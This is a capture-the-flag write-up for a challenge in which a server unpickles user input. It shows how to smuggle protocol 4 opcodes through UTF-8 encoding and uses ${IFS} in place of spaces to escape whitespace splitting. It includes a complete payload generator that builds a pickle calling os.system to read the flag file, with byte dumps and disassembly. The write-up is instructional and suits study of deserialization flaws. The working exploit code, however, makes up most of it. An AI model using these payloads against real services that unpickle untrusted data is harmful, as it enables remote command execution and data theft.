The challenge server runs a Python script called unipickle.py with the following code:
#!/usr/local/bin/python
import pickle
pickle.loads(input("pickle: ").split()[0].encode())
The Python script performs the following steps:
- Prompt the user for input with the prompt "pickle: ".
- Read the user input as a Unicode string.
- Split the string on whitespace.
- Take the first part.
- Encode that part as UTF-8 to get a bytes() object.
- Call pickle.loads() on the resulting bytes() object.
To solve the challenge, you need to send a valid Unicode string. Its first whitespace-separated part, after the script encodes it as a UTF-8 bytes() object, must be a pickle that pickle.loads() can work with.
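To see exactly which bytes reach pickle.loads(), you can replay the script's string handling without the final unpickling step. This is a minimal sketch. The helper name server_bytes is hypothetical and is not part of unipickle.py.

```python
def server_bytes(user_input: str) -> bytes:
    """Hypothetical helper: replay unipickle.py's preprocessing, without unpickling."""
    # str.split() with no argument splits on any Unicode whitespace,
    # and [0] keeps only the first chunk
    first_part = user_input.split()[0]
    # str.encode() defaults to UTF-8
    return first_part.encode()


print(server_bytes("abc def"))  # b'abc'
print(server_bytes("ab\ncd"))   # b'ab'
print(server_bytes("é"))        # b'\xc3\xa9'
```

A single typed character can turn into several bytes. Any whitespace, including a newline, ends the payload.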
Python pickle protocol versions
I’ve stored a pickled Python object in a file called uname.pickle. When you run pickle.loads() on this file’s contents, Python runs uname on your system.
Here’s what the contents of the pickle file look like when you print them with xxd:
00000000: 6370 6f73 6978 0a73 7973 7465 6d0a 2856 cposix.system.(V
00000010: 756e 616d 650a 7452 2e uname.tR.
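The post doesn't say how uname.pickle was created. One way to get the same bytes, offered here as an assumption rather than the original method, follows two steps:
- Pickle an object at protocol 0 whose __reduce__ returns os.system and its argument.
- Strip the unused memo PUT opcodes with pickletools.optimize().

The class name RunUname is hypothetical. Dumping is safe. Only loading the result runs the command.

```python
import os
import pickle
import pickletools
from pathlib import Path


class RunUname:
    """Hypothetical helper: unpickling an instance calls os.system("uname")."""

    def __reduce__(self):
        # (callable, args): the unpickler will call os.system("uname")
        return (os.system, ("uname",))


# Protocol 0 emits text opcodes; on Linux, os.system lives in the posix module
raw = pickle.dumps(RunUname(), protocol=0)
# Drop the PUT opcodes that no GET refers to
data = pickletools.optimize(raw)
print(data)  # b'cposix\nsystem\n(Vuname\ntR.' on POSIX systems

Path("uname.pickle").write_bytes(data)
```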
You can visualize the contents of this Python pickle using the pickletools module with python3 -m pickletools:
python3 -m pickletools uname.pickle
This prints the following:
0: c GLOBAL 'posix system'
14: ( MARK
15: V UNICODE 'uname'
22: t TUPLE (MARK at 14)
23: R REDUCE
24: . STOP
highest protocol among opcodes = 0
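pickletools.genops() exposes the same information programmatically, which is handy for checking a payload without loading it. This short sketch uses the bytes from the xxd dump of uname.pickle:

```python
import pickletools

# Bytes of uname.pickle, copied from the xxd dump
data = b"cposix\nsystem\n(Vuname\ntR."

# genops() walks the opcodes without executing anything
for opcode, arg, pos in pickletools.genops(data):
    print(pos, opcode.name, arg)

# Each OpcodeInfo records the protocol version that introduced the opcode
highest = max(opcode.proto for opcode, _, _ in pickletools.genops(data))
print("highest protocol:", highest)  # highest protocol: 0
```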
Python pickles have different protocol versions. Protocol version 0 is popular for deserialization attacks because its opcodes are printable ASCII characters. Opcodes such as GLOBAL and UNICODE terminate their arguments with a newline.
Yet, in this challenge the unipickle.py script only looks at the first part of the input after calling .split() on it. Since .split() treats newlines as whitespace, a protocol 0 payload gets cut off at its first newline. That makes version 0 impractical here.
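Running the protocol 0 payload through the script's split-and-encode step shows the problem: the first newline ends the payload right after the GLOBAL module name. This minimal sketch replays only the string handling and never unpickles anything:

```python
# Protocol 0 payload from uname.pickle
payload = b"cposix\nsystem\n(Vuname\ntR."

# Every byte is printable ASCII or a newline
print(all(32 <= b < 127 or b == 0x0A for b in payload))  # True

# unipickle.py keeps only the first whitespace-separated chunk
survivor = payload.decode().split()[0].encode()
print(survivor)  # b'cposix'
```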
Instead, I focused on creating a protocol version 4 payload that still passes as valid UTF-8.
Smuggling higher values as Unicode characters
The trick is to smuggle version 4 protocol opcodes inside UTF-8 strings. This technique is called Unicode injection and belongs to a larger class of attacks called encoded injection.
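Valid UTF-8 sequences follow one of these four byte patterns:
0xxx xxxx (1 byte, U+0000 to U+007F)
110x xxxx 10xx xxxx (2 bytes, U+0080 to U+07FF)
1110 xxxx 10xx xxxx 10xx xxxx (3 bytes, U+0800 to U+FFFF)
1111 0xxx 10xx xxxx 10xx xxxx 10xx xxxx (4 bytes, U+10000 to U+10FFFF)
A strict decoder such as Python's also rejects overlong encodings, so two-byte lead bytes start at 0xC2. It also rejects encoded UTF-16 surrogates.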
Your input passes through unipickle.py unchanged when two conditions hold:
- The protocol version 4 opcodes and their argument bytes fit together into these sequences.
- None of the resulting characters is whitespace.
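The payload in the next section depends on one such fit. STACK_GLOBAL is opcode 0x93, a byte with the continuation shape 10xx xxxx, and a UTF-8 decoder rejects it on its own. Sent as the character U+0093, it becomes the pair C2 93. Placing the BINPUT opcode (q) in front makes the unpickler read the C2 lead byte as BINPUT's one-byte memo index.

The sketch below checks each step with pickletools. The byte string is a fragment of the payload with a STOP opcode appended so that genops() has an end.

```python
import pickletools

# Look up STACK_GLOBAL in pickletools' opcode table
stack_global = next(op for op in pickletools.opcodes if op.name == "STACK_GLOBAL")
print(hex(ord(stack_global.code)), stack_global.proto)  # 0x93 4

# On its own, 0x93 is a continuation byte, so UTF-8 decoding rejects it
try:
    b"\x93".decode("utf-8")
except UnicodeDecodeError as exc:
    print("rejected:", exc.reason)  # rejected: invalid start byte

# The character U+0093 encodes to the two-byte sequence C2 93
print(chr(0x93).encode())  # b'\xc2\x93'

# BINPUT ('q') takes a one-byte memo index and swallows the C2 lead byte,
# so the next opcode the unpickler sees is STACK_GLOBAL
fragment = b"U\x06systemq" + chr(0x93).encode() + b"."
for opcode, arg, pos in pickletools.genops(fragment):
    print(pos, opcode.name, arg)
```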
Note: another trick that keeps unipickle.py from removing parts of your input is to use ${IFS} as a space replacement, a common technique in command injection. This is what head /flag* looks like when you replace its space character with ${IFS}:
head${IFS}/flag*
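You can confirm that a POSIX shell treats an unquoted ${IFS} as a word separator. This sketch assumes sh is available, as on Linux, and uses a harmless echo instead of the real command. On POSIX systems, os.system() also hands its argument to sh -c.

```python
import subprocess

command = "echo hello world".replace(" ", "${IFS}")
print(command)  # echo${IFS}hello${IFS}world

# The command string itself contains no whitespace, so str.split() keeps it whole
print(command.split() == [command])  # True

# The shell expands ${IFS}, then splits the result into separate words
result = subprocess.run(["sh", "-c", command], capture_output=True, text=True)
print(result.stdout, end="")  # hello world
```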
Payload generator
Here’s the payload generator:
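#!/usr/bin/env python3
import math

# SHORT_BINSTRING 'posix', SHORT_BINSTRING 'system', then BINPUT (q) whose
# one-byte argument 0xC2 doubles as the UTF-8 lead byte for STACK_GLOBAL (0x93)
start = b'U\x05posixU\x06systemq\xc2\x93'
# TUPLE, REDUCE, STOP
end = b'tR.'
# Shell word separator that contains no whitespace characters
padding = "${IFS}"
# Padding to >= 33 keeps the length byte above the whitespace range (9-13, 28-32)
minimum_padded_length = 33


def make_payload(payload: str) -> bytes:
    # Replace spaces so that .split() on the server keeps the whole command
    payload = payload.replace(" ", padding)
    length = len(payload)
    # Keeps chr(len(payload)) below 128, i.e. a single UTF-8 byte.
    # Assumes an ASCII command, since len() counts characters, not bytes.
    assert length < 124
    missing = minimum_padded_length - length
    # Append whole ${IFS} units until the length reaches 33 (no-op if already long enough)
    add_padding_count = int(math.ceil(missing / len(padding)))
    payload = payload + (padding * add_padding_count)
    # MARK, then SHORT_BINSTRING with a one-byte length and the command
    return start + f'(U{chr(len(payload))}{payload}'.encode() + end


payload = "head /flag*"
encoded = make_payload(payload).decode()
print(encoded)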
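The generator doesn't explain its constants. One likely reason for minimum_padded_length = 33 concerns the length byte written by chr(len(payload)):
- str.split() must not treat it as whitespace.
- chr() only yields a single UTF-8 byte below 128.

This is an inference from the code, not something the generator states. The sketch lists which lengths would be unsafe:

```python
# Which single-byte values does str.split() treat as whitespace?
unsafe = [n for n in range(128) if chr(n).isspace()]
print(unsafe)  # [9, 10, 11, 12, 13, 28, 29, 30, 31, 32]

# Lengths of 33 (the character "!") and up avoid all of them
print(max(unsafe) < 33)  # True

# From 128 on, chr(n) encodes to two bytes and would break
# SHORT_BINSTRING's one-byte length field
print(len(chr(127).encode()), len(chr(128).encode()))  # 1 2
```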
Here’s the payload decoded with pickletools:
0: U SHORT_BINSTRING 'posix'
7: U SHORT_BINSTRING 'system'
15: q BINPUT 194
17: \x93 STACK_GLOBAL
18: ( MARK
19: U SHORT_BINSTRING 'head${IFS}/flag*${IFS}${IFS}${IFS}'
55: t TUPLE (MARK at 18)
56: R REDUCE
57: . STOP
highest protocol among opcodes = 4
This is what you’ll see when you pipe the payload generator’s output into xxd:
00000000: 5505 706f 7369 7855 0673 7973 7465 6d71 U.posixU.systemq
00000010: c293 2855 2268 6561 6424 7b49 4653 7d2f ..(U"head${IFS}/
00000020: 666c 6167 2a24 7b49 4653 7d24 7b49 4653 flag*${IFS}${IFS
00000030: 7d24 7b49 4653 7d74 522e 0a }${IFS}tR..
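Before sending the payload, you can check offline that it survives unipickle.py's preprocessing unchanged and disassembles as expected, all without unpickling it. This minimal sketch copies the bytes from the xxd dump, minus print()'s trailing newline:

```python
import pickletools

# Generator output, copied from the xxd dump without the trailing 0a
payload = b'U\x05posixU\x06systemq\xc2\x93(U"head${IFS}/flag*${IFS}${IFS}${IFS}tR.'

# What gets sent is the UTF-8 decoding of these bytes, followed by a newline
typed = payload.decode("utf-8") + "\n"

# Replay unipickle.py: split on whitespace, keep the first part, encode as UTF-8
received = typed.split()[0].encode()
print(received == payload)  # True

# Disassemble without executing
highest = max(op.proto for op, _, _ in pickletools.genops(received))
print("highest protocol:", highest)  # highest protocol: 4
```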
This challenge requires you to closely study Python’s pickle implementation and goes way beyond just blindly copying YAML payloads.